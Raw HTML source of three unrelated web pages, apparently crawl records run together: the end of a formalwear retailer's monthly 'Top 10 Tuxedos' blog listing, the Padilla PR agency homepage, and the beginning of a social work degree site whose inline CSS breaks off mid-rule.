id="post-19447" class="post-19447 post type-post status-publish format-standard has-post-thumbnail hentry category-top-10 category-tuxedo-trends tag-grey-tuxedos tag-ike-behar tag-jean-yves tag-navy-tuxedos tag-new-tuxedos tag-prom-tuxedos tag-slim-fit tag-top-10 tag-tuxedo-styles tag-wedding-tuxedos"> <a href="https://www.mytuxedocatalog.com/blog/top-10-tuxedos-for-april-2019/" class="featured-link"><img width="292" height="205" src="https://www.mytuxedocatalog.com/wp-content/uploads/2019/03/April-2019.jpg" class="attachment-mtc-product-list size-mtc-product-list wp-post-image" alt="" title="Top 10 Tuxedos for April 2019" /></a> <article> <ul class="post-categories"> <li><a href="https://www.mytuxedocatalog.com/blog/category/tuxedo-trends/top-10/" rel="category tag">Top 10</a></li> <li><a href="https://www.mytuxedocatalog.com/blog/category/tuxedo-trends/" rel="category tag">Tuxedo Trends</a></li></ul> <h3><a href="https://www.mytuxedocatalog.com/blog/top-10-tuxedos-for-april-2019/">Top 10 Tuxedos for April 2019</a></h3> <div class="excerpt"><p>Every month Paul Morrell Formalwear tracks the rental data for all of the tuxedo styles we offer and determines the&#8230;</p> </div> </article> </li><li id="post-19427" class="post-19427 post type-post status-publish format-standard has-post-thumbnail hentry category-top-10 category-tuxedo-trends tag-ike-behar tag-navy-tuxedos tag-new-suits tag-new-tuxedos tag-prom tag-prom-season tag-prom-tuxedos tag-slim-fit tag-top-10 tag-tuxedo-styles tag-tuxedo-trends tag-tuxedos tag-wedding-tuxedos"> <a href="https://www.mytuxedocatalog.com/blog/top-10-tuxedos-for-march-2019/" class="featured-link"><img width="292" height="205" src="https://www.mytuxedocatalog.com/wp-content/uploads/2019/03/March-2019.jpg" class="attachment-mtc-product-list size-mtc-product-list wp-post-image" alt="" title="Top 10 Tuxedos for March 2019" /></a> <article> <ul class="post-categories"> <li><a href="https://www.mytuxedocatalog.com/blog/category/tuxedo-trends/top-10/" rel="category tag">Top 10</a></li> <li><a href="https://www.mytuxedocatalog.com/blog/category/tuxedo-trends/" rel="category tag">Tuxedo Trends</a></li></ul> <h3><a href="https://www.mytuxedocatalog.com/blog/top-10-tuxedos-for-march-2019/">Top 10 Tuxedos for March 2019</a></h3> <div class="excerpt"><p>Every month Paul Morrell Formalwear tracks the rental data for all of the tuxedo styles we offer and determines the&#8230;</p> </div> </article> </li><li id="post-19398" class="post-19398 post type-post status-publish format-standard has-post-thumbnail hentry category-top-10 category-tuxedo-trends tag-black-tie tag-bow-ties tag-grey-tuxedos tag-ike-behar tag-michael-kors tag-navy-tuxedos tag-prom-tuxedos tag-top-10 tag-tuxedo-trends tag-wedding-tuxedos"> <a href="https://www.mytuxedocatalog.com/blog/top-10-tuxedos-for-february-2019/" class="featured-link"><img width="292" height="205" src="https://www.mytuxedocatalog.com/wp-content/uploads/2019/03/February-2019.jpg" class="attachment-mtc-product-list size-mtc-product-list wp-post-image" alt="" title="Top 10 Tuxedos for February 2019" /></a> <article> <ul class="post-categories"> <li><a href="https://www.mytuxedocatalog.com/blog/category/tuxedo-trends/top-10/" rel="category tag">Top 10</a></li> <li><a href="https://www.mytuxedocatalog.com/blog/category/tuxedo-trends/" rel="category tag">Tuxedo Trends</a></li></ul> <h3><a href="https://www.mytuxedocatalog.com/blog/top-10-tuxedos-for-february-2019/">Top 10 Tuxedos for February 2019</a></h3> <div class="excerpt"><p>Every month Paul Morrell Formalwear tracks the rental data for all of the tuxedo styles we offer and determines the&#8230;</p> </div> </article> </li> </ul> </div> </div> </section> <footer> <div class="footer-nav"> <ul id="footer-secondary-nav" class="menu"><li id="menu-item-16883" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16883"><a href="/catalog/rental-tuxedos-and-suits/">Tuxedos &#038; Suits</a></li> <li id="menu-item-16884" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16884"><a href="/catalog/">Accessories</a></li> <li id="menu-item-16885" class="hideMe menu-item menu-item-type-post_type menu-item-object-page menu-item-16885"><a href="https://www.mytuxedocatalog.com/locate/">Locations</a></li> <li id="menu-item-16887" class="hideMe menu-item menu-item-type-post_type menu-item-object-page menu-item-16887"><a href="https://www.mytuxedocatalog.com/about/">About MTC</a></li> <li id="menu-item-16886" class="hideMe menu-item menu-item-type-post_type menu-item-object-page menu-item-16886"><a href="https://www.mytuxedocatalog.com/contact/">Contact</a></li> <li id="menu-item-16888" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16888"><a href="https://www.mytuxedocatalog.com/blog/">Blog</a></li> </ul> </div> <div class="footer-logo"> <a href="https://www.mytuxedocatalog.com"> <img src="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/[email protected]" alt="MyTuxedoCatalog.com" /> </a> </div> <div class="footer-bottom"> <div class="row"> <div class="columns small-12"> <div class="copyright"> <a class="social facebook hideMe" href="https://www.facebook.com/Paul.Morrell.Formalwear" target="_blank" title="Follow us on Facebook"><i class="icon icon-facebook"></i></a> <a class="social twitter hideMe" href="https://twitter.com/paulmorrelltuxs" target="_blank" title="Follow us on Twitter"><i class="icon icon-twitter"></i></a> <a class="social pinterest hideMe" href="http://pinterest.com/MyTuxedoCatalog/" target="_blank" title="Follow us on Pinterest"><i class="icon icon-pinterest"></i></a> <span><em>&copy;</em> 2019 - Paul Morrell Formalwear</span> </div> <div class="credit"> Website by: <a href="http://www.zaxiscreative.com/" target="_blank" title="Little Rock Web Design &amp; Creative Consulting" class="credit-link">Z-AXIS Creative</a> </div> </div> </div> </div> </footer> </div> <!-- .offcanvas-wrapper --> </div> <!-- .site-wrapper --> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-includes/js/underscore.min.js?ver=1.8.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var countVars = {"disqusShortname":"mytuxedocatalog"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.0.16'></script> <script type='text/javascript'> /* <![CDATA[ */ var embedVars = {"disqusConfig":{"integration":"wordpress 3.0.16"},"disqusIdentifier":"15736 https:\/\/www.mytuxedocatalog.com\/?page_id=15736","disqusShortname":"mytuxedocatalog","disqusTitle":"MyTuxedoCatalog.com","disqusUrl":"https:\/\/www.mytuxedocatalog.com\/","postId":"15736"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-content/plugins/disqus-comment-system/public/js/comment_embed.js?ver=3.0.16'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/js/script.js?ver=1.6.2'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/js/plugins.js?ver=1.0'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> </body> </html>
0
<!doctype html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Communications Agency with PR Roots - MN, VA, NY, DC - Padilla</title> <!-- This site is optimized with the Yoast SEO plugin v7.6.1 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://padillaco.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Communications Agency with PR Roots - MN, VA, NY, DC - Padilla" /> <meta property="og:description" content="We build, grow and protect brands worldwide through public relations, advertising, digital and social marketing, investor relations and brand strategy. Let us show you how to connect with purpose." /> <meta property="og:url" content="https://padillaco.com/" /> <meta property="og:site_name" content="Padilla" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="We build, grow and protect brands worldwide through public relations, advertising, digital and social marketing, investor relations and brand strategy. Let us show you how to connect with purpose." /> <meta name="twitter:title" content="Communications Agency with PR Roots - MN, VA, NY, DC - Padilla" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/padillaco.com\/","name":"Padilla","potentialAction":{"@type":"SearchAction","target":"https:\/\/padillaco.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /> <link rel='dns-prefetch' href='//cdn.jsdelivr.net' /> <link rel='dns-prefetch' href='//padillaco.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Padilla &raquo; Feed" href="https://padillaco.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Padilla &raquo; Comments Feed" href="https://padillaco.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/padillaco.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.6"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='sb_instagram_styles-css' href='https://padillaco.com/wp-content/plugins/instagram-feed-pro/css/sb-instagram.css?ver=4.0.6' type='text/css' media='all' /> <link rel='stylesheet' id='wpthemepadilla-style-css' href='https://padillaco.com/wp-content/themes/wpthemepadilla/style.css?ver=4.9.6' type='text/css' media='all' /> <link rel='stylesheet' id='wpthemepadilla-elements-css' href='https://padillaco.com/wp-content/themes/wpthemepadilla/css/wp-core.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='wpthemepadilla-base-styles-css' href='https://padillaco.com/wp-content/themes/wpthemepadilla/css/styles-min.css?ver=1.2' type='text/css' media='all' /> <link rel='stylesheet' id='wpthemepadilla-print-styles-css' href='https://padillaco.com/wp-content/themes/wpthemepadilla/css/print.css?ver=1.0' type='text/css' media='all' /> <script type='text/javascript' src='https://padillaco.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://padillaco.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js?ver=1.0'></script> <script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/gsap/latest/TweenMax.min.js?ver=1.0'></script> <script type='text/javascript' src='//cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js?ver=1.0'></script> <link rel='https://api.w.org/' href='https://padillaco.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://padillaco.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://padillaco.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.6" /> <link rel='shortlink' href='https://padillaco.com/' /> <link rel="alternate" type="application/json+oembed" href="https://padillaco.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpadillaco.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://padillaco.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpadillaco.com%2F&#038;format=xml" /> <style type="text/css"> .site-title, .site-description { position: absolute; clip: rect(1px, 1px, 1px, 1px); } </style> <link rel="icon" href="https://padillaco.com/wp-content/uploads/2018/06/cropped-site-icon-32x32.gif" sizes="32x32" /> <link rel="icon" href="https://padillaco.com/wp-content/uploads/2018/06/cropped-site-icon-192x192.gif" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://padillaco.com/wp-content/uploads/2018/06/cropped-site-icon-180x180.gif" /> <meta name="msapplication-TileImage" content="https://padillaco.com/wp-content/uploads/2018/06/cropped-site-icon-270x270.gif" /> </head> <body class="home page-template-default page page-id-7"> <!-- Google Tag Manager --> <noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-WL6LGH" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-WL6LGH');</script> <!-- End Google Tag Manager --> <div class="headerC"> <header> <div class="logoC"> <a href="/"> <img src="https://padillaco.com/wp-content/themes/wpthemepadilla/images/logo.png" title="Padilla" alt="Padilla" class="logo"> <img src="https://padillaco.com/wp-content/themes/wpthemepadilla/images/logo-alt.png" title="Padilla" alt="Padilla" style="display:none;" class="logo-alt"></a> </div> <div class="hamburgerBtnC"> <a href=""> <span></span> </a> </div> </header> <div class="mainNavC"> <a class="mainNavG-close"></a> <div class="mainNavG"> <div class="mobileNavCloseC"><a href="#"></a></div> <div class="mainNav"> <a href="https://padillaco.com/about-us/">About Us</a> <a href="https://padillaco.com/what-we-do/">What We Do</a> <a href="https://padillaco.com/our-work/">Our Work</a> <a href="https://padillaco.com/the-news/">The News</a> <a href="https://padillaco.com/careers/">Careers</a> <a href="https://padillaco.com/contact-us/">Contact Us</a> </div><!-- mainNav --> <div class="mobileSearchC"> <form method="GET" action="/"> <input class="mobileSearchBox" type="text" name="s" placeholder="Search" autocomplete="off" /> <input type="image" src="https://padillaco.com/wp-content/themes/wpthemepadilla/images/btn-search-white.svg" class="mobileSearchBtn" /> </form> </div><!-- searchNav --> <div class="utilityNavC"> Social <div class="menu-social-menu-container"><ul id="social-menu" class="menu"><li id="menu-item-35" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-35"><a target="_blank" href="https://www.linkedin.com/company/padilla">LinkedIn</a></li> <li id="menu-item-36" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36"><a target="_blank" href="https://www.facebook.com/padillacomm/">Facebook</a></li> <li id="menu-item-37" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-37"><a target="_blank" href="https://twitter.com/Padilla_Comm">Twitter</a></li> <li id="menu-item-38" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-38"><a target="_blank" href="https://www.instagram.com/padilla_comm/">Instagram</a></li> <li id="menu-item-39" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-39"><a target="_blank" href="http://www.buzzbinpadillaco.com/">The Buzz Bin</a></li> </ul></div> </div><!-- utilityNavC --> </div><!-- mainNavG --> </div><!-- mainNavC --> </div><!-- headerC --> <div id="particles-js" class="homeHeaderC"> <div class="homeHeader"> <div class="homeHeader-captionC"> <span class="homeHeader-caption t1">Build.&nbsp;</span> <span class="homeHeader-caption t2">Grow.&nbsp;</span> <span class="homeHeader-caption t3">Protect.</span> </div> <!-- <div class="homeHeader-search" style="opacity: 0.0;"> </div> --> <div class="homeHeader-txt"> We build, grow and protect brands worldwide through public relations, advertising, digital and social marketing, investor relations and brand strategy. Let us show you how to connect with purpose. </div> <div class="homeHeader-btnC"> <a href="/about-us/" class="homeHeader-btn">See How We Do It</a> </div> </div><!-- homeHeader --> </div><!-- homeHeaderC --> <div class="galleryNavC"> <a href="https://padillaco.com/case-study/consorzio-del-prosciutto-di-parma-2/" style="background-image: url(https://padillaco.com/wp-content/uploads/2018/11/card-parma.gif)" class="galleryNav-item img"><div class="galleryNav-overC"><div class="galleryNav-txtC"><div class="galleryNav-hdr">Consorzio del Prosciutto di Parma</div>Digital training tools give chefs a leg up.</div></div></a><a href="https://padillaco.com/case-study/tru-by-hilton-2/" style="background-image: url(https://padillaco.com/wp-content/uploads/2019/03/card.jpg)" class="galleryNav-item img"><div class="galleryNav-overC"><div class="galleryNav-txtC"><div class="galleryNav-hdr">Tru by Hilton</div>First-Ever Property Opens With A Pop!</div></div></a><a href="https://padillaco.com/the-news/news-items/avocados-from-mexico-selects-padilla-as-pr-aor/" style="" class="galleryNav-item txt"><div class="galleryNav-overC"><div class="galleryNav-txtC"><div class="galleryNav-hdr">Avocados From Mexico Selects Padilla as PR AOR </div><div class="galleryNav-btn">News</div></div></div></a><a href="https://padillaco.com/the-news/news-items/padilla-wins-gold-sabre-award-2/" style="" class="galleryNav-item txt"><div class="galleryNav-overC"><div class="galleryNav-txtC"><div class="galleryNav-hdr">Padilla Wins Gold SABRE Award</div><div class="galleryNav-btn">News</div></div></div></a><a href="https://padillaco.com/case-study/niagara-conservation-2/" style="background-image: url(https://padillaco.com/wp-content/uploads/2019/01/card.jpg)" class="galleryNav-item img"><div class="galleryNav-overC"><div class="galleryNav-txtC"><div class="galleryNav-hdr">Niagara Conservation</div>A disruptor campaign incites millennials to save water.</div></div></a><a href="https://padillaco.com/case-study/cargill/" style="background-image: url(https://padillaco.com/wp-content/uploads/2018/06/card-1-26.jpg)" class="galleryNav-item img"><div class="galleryNav-overC"><div class="galleryNav-txtC"><div class="galleryNav-hdr">Cargill</div>Educating Horse Owners on Topline Health</div></div></a><a href="https://padillaco.com/case-study/wilsonart-2/" style="background-image: url(https://padillaco.com/wp-content/uploads/2018/10/card-w.png)" class="galleryNav-item img"><div class="galleryNav-overC"><div class="galleryNav-txtC"><div class="galleryNav-hdr">Wilsonart</div>Helping architects and designers see the forests behind the wood.</div></div></a><a href="https://padillaco.com/case-study/u-s-highbush-blueberry-council/" style="background-image: url(https://padillaco.com/wp-content/uploads/2018/06/card-29.jpg)" class="galleryNav-item img"><div class="galleryNav-overC"><div class="galleryNav-txtC"><div class="galleryNav-hdr">U.S. Highbush Blueberry Council </div>The magic of #GoodnessFrozen.</div></div></a><a href="https://padillaco.com/the-news/news-items/tom-jollie-receives-minnesota-prsas-donald-g-padilla-community-excellence-award/" style="" class="galleryNav-item txt"><div class="galleryNav-overC"><div class="galleryNav-txtC"><div class="galleryNav-hdr">Tom Jollie Receives Donald G. Padilla Community Excellence Award</div><div class="galleryNav-btn">News</div></div></div></a> </div><!-- galleryNavC --> <a href="/about-us" class="fullWidthButtonC">See how Padilla connects with purpose.<span class="icon-right-arrow"></span></a> <div class="footerC gridPadTop gridPadBtm"> <footer> <div class="footer-title">Let&rsquo;s Connect</div><a href="/contact-us/" class="btn-getInTouch">Get In Touch</a> <div class="footerNavC"> <div class="footerNav"> <div class="footerNav-Hdr">Social</div> <div class="menu-social-menu-container"><ul id="social-menu" class="footerNav-items"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-35"><a target="_blank" href="https://www.linkedin.com/company/padilla">LinkedIn</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36"><a target="_blank" href="https://www.facebook.com/padillacomm/">Facebook</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-37"><a target="_blank" href="https://twitter.com/Padilla_Comm">Twitter</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-38"><a target="_blank" href="https://www.instagram.com/padilla_comm/">Instagram</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-39"><a target="_blank" href="http://www.buzzbinpadillaco.com/">The Buzz Bin</a></li> </ul></div> </div> <div class="footerNav"> <div class="footerNav-Hdr">Offices</div> <div class="menu-office-menu-container"><ul id="office-menu" class="footerNav-items"><li id="menu-item-60" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-60"><a href="https://padillaco.com/contact-us/minneapolis/">Minneapolis</a></li> <li id="menu-item-59" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-59"><a href="https://padillaco.com/contact-us/new-york/">New York</a></li> <li id="menu-item-58" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-58"><a href="https://padillaco.com/contact-us/chicago/">Chicago</a></li> <li id="menu-item-57" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57"><a href="https://padillaco.com/contact-us/richmond/">Richmond</a></li> <li id="menu-item-56" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-56"><a href="https://padillaco.com/contact-us/washington-dc/">Washington D.C.</a></li> <li id="menu-item-63" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-63"><a href="https://padillaco.com/contact-us/san-francisco/">San Francisco</a></li> </ul></div> </div> <div class="footerNav"> <div class="footerNav-Hdr">Contact</div> <div class="menu-contact-menu-container"><ul id="contact-menu" class="footerNav-items"><li id="menu-item-64" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-64"><a href="https://padillaco.com/contact-us/">Work with Padilla</a></li> <li id="menu-item-65" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-65"><a target="_blank" href="https://recruiting.ultipro.com/PAD1005PCRT/JobBoard/c7213a1d-0fa7-2550-7335-adfef12ed051/?q=&#038;o=postedDateDesc">Join Our Team</a></li> </ul></div> </div> </div><!-- footerNavC --> <div class="crisisHotline">24/7 Crisis Hotline 1.877.PR ER 911</div> <div class="copyrightC">&copy; 2019 Padilla, an AVENIR GLOBAL company. All Rights Reserved.</div> <div class="disclaimerNav"> <a href="/privacy-policy/">Privacy Policy</a> | <a href="/terms-of-use/">Terms of Use</a> </div> </footer> </div><!-- footerC --> <!-- Instagram Feed JS --> <script type="text/javascript"> var sbiajaxurl = "https://padillaco.com/wp-admin/admin-ajax.php"; </script> <script type='text/javascript' src='https://padillaco.com/wp-content/themes/wpthemepadilla/js/wp/skip-link-focus-fix.js?ver=20151215'></script> <script type='text/javascript' src='https://padillaco.com/wp-content/themes/wpthemepadilla/js/scripts-min.js?ver=1.1'></script> <script type='text/javascript' src='https://padillaco.com/wp-includes/js/wp-embed.min.js?ver=4.9.6'></script> </body> </html>
0
<!DOCTYPE html><html xmlns:fb="https://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#" lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width" /><link rel="profile" href="https://gmpg.org/xfn/11"><title>Welcome To Social Work Degree Center! - Social Work Degree Center</title><style id="rocket-critical-css">body,.logo,.headline,h1,h2,.small-title,button{font-family:Cabin,Tahoma,Arial,Verdana,sans-serif;font-weight:400}body{background-color:#fff;font-size:16px;line-height:26px}body{color:#1E1E1E}a{color:#AE2525}button{background-color:#22A340;color:#FFF;padding:13px 26px}.inner{max-width:1145px}@media all and (min-width:900px){.sidebar-content>.content{width:66.026200873362%}.sidebar{width:33.013100436681%}}.format-text-main{font-size:16px;line-height:26px}.format-text-main a{border-bottom:1px solid #AE2525}.format-text-main p:not(:empty):not(:last-child),.format-text-main blockquote{margin-bottom:26px}.format-text-main .alignright{margin-left:26px}.content-item-text h2{color:#1E1E1E}.format-text-main h1,.format-text-main h2,.format-text-main input,.format-text-main img.alignright{margin-bottom:13px;position:relative}.content-item-text h2{margin-top:39px}.format-text-main h1{font-family:Roboto Condensed,Tahoma,Arial,Verdana,sans-serif;font-size:47px;font-weight:700;line-height:66px}.format-text-main h2{font-family:Roboto Condensed,Tahoma,Arial,Verdana,sans-serif;font-size:38px;font-weight:400;line-height:53px}.small-title,.format-text-main .small-title{font-family:Roboto Condensed,Tahoma,Arial,Verdana,sans-serif;font-size:24px;font-weight:400;line-height:36px}@media all and (max-width:900px){.format-text-main h1{font-size:38px;line-height:53px}.format-text-main h2{font-size:32px;line-height:48px}.small-title,.format-text-main .small-title{font-size:20px;line-height:29px}}@media all and (max-width:700px){.format-text-main h1{font-size:28px;line-height:40px}.format-text-main h2{font-size:23px;line-height:32px}.small-title,.format-text-main .small-title{font-size:19px;line-height:29px}}.block-double{padding:52px}.block-triple{padding:78px}@media all and (max-width:1145px){.header .inner{padding-left:13px;padding-right:13px}}@media all and (max-width:900px){.block-triple{padding:52px}.header-menu-trigger{right:13px}.sidebar{padding-bottom:26px;padding-top:26px}}@media all and (max-width:700px){.block-triple,.block-double{padding:26px}.block-triple,.block-double{padding-bottom:26px;padding-top:26px}.block-triple,.block-double,.sidebar{padding-left:13px;padding-right:13px}}.mb-double:not(:last-child){margin-bottom:52px}@media all and (max-width:700px){.mb-double:not(:last-child){margin-bottom:26px}}.header{background-color:#a9d689;padding-bottom:5px;padding-top:5px}.logo{font-size:36px;line-height:1.2em}.custom-logo-link{width:300px}.menu-header .menu-item a{color:#444}.menu-header>.current-menu-item>a{color:#AE2525}@media all and (min-width:900px){.menu-header>.menu-item>a{padding-left:16px;padding-right:16px}}@media all and (max-width:1145px){.header-menu-wrap{right:26px}}@media all and (max-width:900px){.header-menu{margin-left:-13px;margin-right:-13px;margin-top:13px}.header-menu .menu-item a,.header-menu .current-menu-item.menu-item a{padding:13px}}.content-item{background-color:#fff}.content-item{border-bottom-style:solid;border-bottom-width:1px}blockquote,.content-item{border-color:#fff}.content-item-text{color:#1E1E1E}@media all and (min-width:900px){.content-box{margin-bottom:52px;margin-top:52px}}.image-overlay:after{background-color:rgba(0,0,0,.39)}.featured-image-cover.image-overlay{background-image:url(https://socialworkdegreecenter.azureedge.net/wp-content/uploads/2018/07/pasta.jpg)}.featured-image-cover,.featured-image-cover .headline{color:#fff}.sidebar{background-color:#fff;color:#1E1E1E;padding:26px}.sidebar a{border-bottom:1px solid #444;color:#444}.format-text-main .sidebar-title{color:#1E1E1E}.is-content-box .content{background-color:#fff}@media all and (min-width:900px){.content-box.has-sidebar{display:-moz-box;display:-ms-box;display:-ms-flexbox;display:-webkit-box;display:flex;height:100%}.sidebar-content .content{order:2}.sidebar-content .sidebar{order:1}}@media all and (max-width:900px){.sidebar-content>.sidebar{padding-left:13px;padding-right:13px}}@font-face{font-family:md-icon;src:url(https://socialworkdegreecenter.azureedge.net/wp-content/themes/marketers-delight/lib/assets/md.woff) format('woff');font-style:normal;font-weight:400}*,*:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;margin:0;padding:0}body{color:#2e2e2e;position:relative}main{display:block}ul{list-style:square}p{position:relative}img,a img,.size-medium{height:auto;max-width:100%;vertical-align:top}a{text-decoration:none}blockquote{background-color:#fff;border-left:7px solid #777;border-radius:3px;color:#444;display:block;font-style:italic;padding:26px;position:relative}blockquote:before{content:"\201C";color:#ddd;font-family:Georgia,serif;font-size:69px;font-weight:700;position:absolute;left:6px;top:28px}button{border:none;font-size:inherit;position:relative;text-transform:uppercase;z-index:10;-webkit-appearance:none}button{border-bottom:0;border-radius:3px;box-shadow:0 2px 4px rgba(0,0,0,.2);display:inline-block;font-style:normal}label{display:inline-block;margin-bottom:13px}input{font-family:inherit;font-size:inherit;line-height:inherit;padding:16px}select{max-width:100%}.alignright{display:block;float:right}.inner:after,.content-item:after,.sidebar:after,.menu:after{clear:both;content:" ";display:table}.header-wrap,.header{position:relative;z-index:97}.wp-custom-logo .custom-logo-link{display:block}.header-standard .custom-logo-link{float:left;margin-right:13px;position:relative;z-index:10}.content-item{position:relative}.content-item.content-item-headline{border-bottom:none}.featured-image-cover{z-index:50}[class*="format-text-"]{word-wrap:break-word}[class*="format-text-"] *:last-child{margin-bottom:0}.format-text-main .alignright{z-index:10}@media all and (min-width:700px){.header-wrap .content-item-headline{text-align:center}}.inner{margin-left:auto;margin-right:auto;position:relative;z-index:10}.content{position:relative}@media all and (min-width:900px){.sidebar-content>.content{float:right}}.menu{list-style:none}.menu-item{display:inline-block;position:relative;text-align:left;vertical-align:top;z-index:10}.menu-item a{display:block;position:relative}.menu-item-title{position:relative}@media all and (min-width:900px){.menu-item a{padding:16px}}@media all and (max-width:900px){.menu-item:not(:last-child){border-bottom:1px solid 